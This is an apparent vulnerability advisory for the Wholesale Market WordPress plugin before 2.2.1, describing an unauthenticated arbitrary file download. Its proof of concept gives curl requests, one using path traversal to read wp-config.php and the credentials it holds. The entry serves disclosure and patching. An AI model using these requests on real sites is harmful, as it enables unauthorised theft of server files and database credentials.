WordPress Plugin Vulnerabilities
Wholesale Market < 2.2.1 - Unauthenticated Arbitrary File Download
Description
The plugin does not have authorisation check, as well as does not validate user input used to generate system path, allowing unauthenticated attackers to download arbitrary file from the server.
Proof of Concept
1. Install woocommerce (dependency, no setup required) 2. Install the vulnerable plugin (wholesale-market) 3. Invoke the following curl command to ensure the required uploads directory exists: (This creates /var/www/html/wp-content/uploads/wholesale_market_import_error/) curl -i 'http://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_read_csv' 4. Invoke the following curl command to disclose the contents of the wp-config.php file: curl -i 'https://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin§ion=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php'
Affects Plugins
References
CVE
Classification
Type
FILE DOWNLOAD
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-12-12 (about 1 years ago)
Added
2022-12-12 (about 1 years ago)
Last Updated
2022-12-12 (about 1 years ago)